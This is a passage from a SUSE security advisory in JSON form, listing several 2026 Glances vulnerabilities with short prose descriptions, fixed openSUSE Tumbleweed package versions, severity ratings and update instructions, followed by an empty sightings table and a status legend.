"title": "CVE-2026-32596"
},
{
"cve": "CVE-2026-32608",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-32608"
}
],
"notes": [
{
"category": "general",
"text": "Glances is an open-source system cross-platform monitoring tool. The Glances action system allows administrators to configure shell commands that execute when monitoring thresholds are exceeded. These commands support Mustache template variables (e.g., `{{name}}`, `{{key}}`) that are populated with runtime monitoring data. The `secure_popen()` function, which executes these commands, implements its own pipe, redirect, and chain operator handling by splitting the command string before passing each segment to `subprocess.Popen(shell=False)`. Prior to 4.5.2, when a Mustache-rendered value (such as a process name, filesystem mount point, or container name) contains pipe, redirect, or chain metacharacters, the rendered command is split in unintended ways, allowing an attacker who controls a process name or container name to inject arbitrary commands. Version 4.5.2 fixes the issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-32608",
"url": "https://www.suse.com/security/cve/CVE-2026-32608"
},
{
"category": "external",
"summary": "SUSE Bug 1260320 for CVE-2026-32608",
"url": "https://bugzilla.suse.com/1260320"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-32608"
},
{
"cve": "CVE-2026-32609",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-32609"
}
],
"notes": [
{
"category": "general",
"text": "Glances is an open-source system cross-platform monitoring tool. The GHSA-gh4x fix (commit 5d3de60) addressed unauthenticated configuration secrets exposure on the `/api/v4/config` endpoints by introducing `as_dict_secure()` redaction. However, the `/api/v4/args` and `/api/v4/args/{item}` endpoints were not addressed by this fix. These endpoints return the complete command-line arguments namespace via `vars(self.args)`, which includes the password hash (salt + pbkdf2_hmac), SNMP community strings, SNMP authentication keys, and the configuration file path. When Glances runs without `--password` (the default), these endpoints are accessible without any authentication. Version 4.5.2 provides a more complete fix.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-32609",
"url": "https://www.suse.com/security/cve/CVE-2026-32609"
},
{
"category": "external",
"summary": "SUSE Bug 1259832 for CVE-2026-32609",
"url": "https://bugzilla.suse.com/1259832"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-32609"
},
{
"cve": "CVE-2026-32610",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-32610"
}
],
"notes": [
{
"category": "general",
"text": "Glances is an open-source system cross-platform monitoring tool. Prior to version 4.5.2, the Glances REST API web server ships with a default CORS configuration that sets `allow_origins=[\"*\"]` combined with `allow_credentials=True`. When both of these options are enabled together, Starlette\u0027s `CORSMiddleware` reflects the requesting `Origin` header value in the `Access-Control-Allow-Origin` response header instead of returning the literal `*` wildcard. This effectively grants any website the ability to make credentialed cross-origin API requests to the Glances server, enabling cross-site data theft of system monitoring information, configuration secrets, and command line arguments from any user who has an active browser session with a Glances instance. Version 4.5.2 fixes the issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-32610",
"url": "https://www.suse.com/security/cve/CVE-2026-32610"
},
{
"category": "external",
"summary": "SUSE Bug 1259841 for CVE-2026-32610",
"url": "https://bugzilla.suse.com/1259841"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-32610"
},
{
"cve": "CVE-2026-32611",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-32611"
}
],
"notes": [
{
"category": "general",
"text": "Glances is an open-source system cross-platform monitoring tool. The GHSA-x46r fix (commit 39161f0) addressed SQL injection in the TimescaleDB export module by converting all SQL operations to use parameterized queries and `psycopg.sql` composable objects. However, the DuckDB export module (`glances/exports/glances_duckdb/__init__.py`) was not included in this fix and contains the same class of vulnerability: table names and column names derived from monitoring statistics are directly interpolated into SQL statements via f-strings. While DuckDB INSERT values already use parameterized queries (`?` placeholders), the DDL construction and table name references do not escape or parameterize identifier names. Version 4.5.3 provides a more complete fix.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-32611",
"url": "https://www.suse.com/security/cve/CVE-2026-32611"
},
{
"category": "external",
"summary": "SUSE Bug 1259840 for CVE-2026-32611",
"url": "https://bugzilla.suse.com/1259840"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T00:00:00Z",
"details": "critical"
}
],
"title": "CVE-2026-32611"
},
{
"cve": "CVE-2026-32632",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-32632"
}
],
"notes": [
{
"category": "general",
"text": "Glances is an open-source system cross-platform monitoring tool. Glances recently added DNS rebinding protection for the MCP endpoint, but prior to version 4.5.2, the main REST/WebUI FastAPI application still accepts arbitrary `Host` headers and does not apply `TrustedHostMiddleware` or an equivalent host allowlist. As a result, the REST API, WebUI, and token endpoint remain reachable through attacker-controlled domains in classic DNS rebinding scenarios. Once the victim browser has rebound the attacker domain to the Glances service, same-origin policy no longer protects the API because the browser considers the rebinding domain to be the origin. This is a distinct issue from the previously reported default CORS weakness. CORS is not required for exploitation here because DNS rebinding causes the victim browser to treat the malicious domain as same-origin with the rebinding target. Version 4.5.2 contains a patch for the issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-32632",
"url": "https://www.suse.com/security/cve/CVE-2026-32632"
},
{
"category": "external",
"summary": "SUSE Bug 1259839 for CVE-2026-32632",
"url": "https://bugzilla.suse.com/1259839"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2026-32632"
},
{
"cve": "CVE-2026-32633",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-32633"
}
],
"notes": [
{
"category": "general",
"text": "Glances is an open-source system cross-platform monitoring tool. Prior to version 4.5.2, in Central Browser mode, the `/api/4/serverslist` endpoint returns raw server objects from `GlancesServersList.get_servers_list()`. Those objects are mutated in-place during background polling and can contain a `uri` field with embedded HTTP Basic credentials for downstream Glances servers, using the reusable pbkdf2-derived Glances authentication secret. If the front Glances Browser/API instance is started without `--password`, which is supported and common for internal network deployments, `/api/4/serverslist` is completely unauthenticated. Any network user who can reach the Browser API can retrieve reusable credentials for protected downstream Glances servers once they have been polled by the browser instance. Version 4.5.2 fixes the issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-32633",
"url": "https://www.suse.com/security/cve/CVE-2026-32633"
},
{
"category": "external",
"summary": "SUSE Bug 1259838 for CVE-2026-32633",
"url": "https://bugzilla.suse.com/1259838"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T00:00:00Z",
"details": "critical"
}
],
"title": "CVE-2026-32633"
},
{
"cve": "CVE-2026-32634",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-32634"
}
],
"notes": [
{
"category": "general",
"text": "Glances is an open-source system cross-platform monitoring tool. Prior to version 4.5.2, in Central Browser mode, Glances stores both the Zeroconf-advertised server name and the discovered IP address for dynamic servers, but later builds connection URIs from the untrusted advertised name instead of the discovered IP. When a dynamic server reports itself as protected, Glances also uses that same untrusted name as the lookup key for saved passwords and the global `[passwords] default` credential. An attacker on the same local network can advertise a fake Glances service over Zeroconf and cause the browser to automatically send a reusable Glances authentication secret to an attacker-controlled host. This affects the background polling path and the REST/WebUI click-through path in Central Browser mode. Version 4.5.2 fixes the issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-32634",
"url": "https://www.suse.com/security/cve/CVE-2026-32634"
},
{
"category": "external",
"summary": "SUSE Bug 1259837 for CVE-2026-32634",
"url": "https://bugzilla.suse.com/1259837"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-32634"
}
]
}
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.